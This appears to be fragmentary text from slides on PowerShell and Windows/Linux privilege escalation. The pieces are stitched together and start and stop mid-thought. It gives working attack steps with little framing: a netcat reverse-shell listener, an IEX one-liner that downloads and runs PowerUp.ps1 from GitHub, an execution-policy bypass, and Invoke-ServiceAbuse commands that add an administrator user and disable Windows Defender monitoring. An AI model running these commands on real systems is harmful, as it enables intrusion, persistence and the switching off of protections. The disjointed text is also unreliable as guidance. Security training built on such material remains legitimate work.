Core • Installed from Windows 7 • Cmdlets use verb-noun names to reduce command memorization • PowerShell uses a "verb-noun" naming system. • Exapmle: • cd -> Set-Location • cat, type -> Get-Content • Alias is also registered (Check : > alias) • Script *.ps1
here. Because there are many. • Is there a vulnerability in the service on which the system is running? • If you are in an environment where your code can run, it is best to get a Reverse shell. • Will help you (https://www.exploit-db.com/) • If you install Reverse tcp using some kind of vulnerability, tcp will return to your server. • PayloadsAllTheThings or (MSFVenom Cheatsheet. This uses a meterpriter) (https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodol ogy%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) • Your Server (listen) : $ nc –lvnp 4444 # listen 4444 port
user has higher privileges such as administrator. • Example : Dirty Cow CVE-2016-5195 (https://www.exploit- db.com/exploits/40847, etc) • Sorry for the Linux environment. It was the most affordable. The same applies to Windows.
Internet, you can download it from Github PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.co m/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks • The most common way I end up using PowerUp is by using the Invoke-AllChecks function, which runs through all relevant checks for the machine and outputs a status report:
-exec bypass 2. PS C:\> Import-Module PowerUp.ps1 3. PS C:\> Invoke-AllChecks 4. If an Abuse Function is found 1. Adding a new user with password with -User and -Password options PS C:\> Invoke-ServiceAbuse -Name ‘< AbuseService>' -User <User> -Password <Password> 2. Running a custom command (Disable Windows Defender) PS C:\> Invoke-ServiceAbuse -Name ‘< AbuseService>' -Command "Set- MpPreference -DisableRealtimeMonitoring $true" 5. PS C:\>Restart-Computer -Force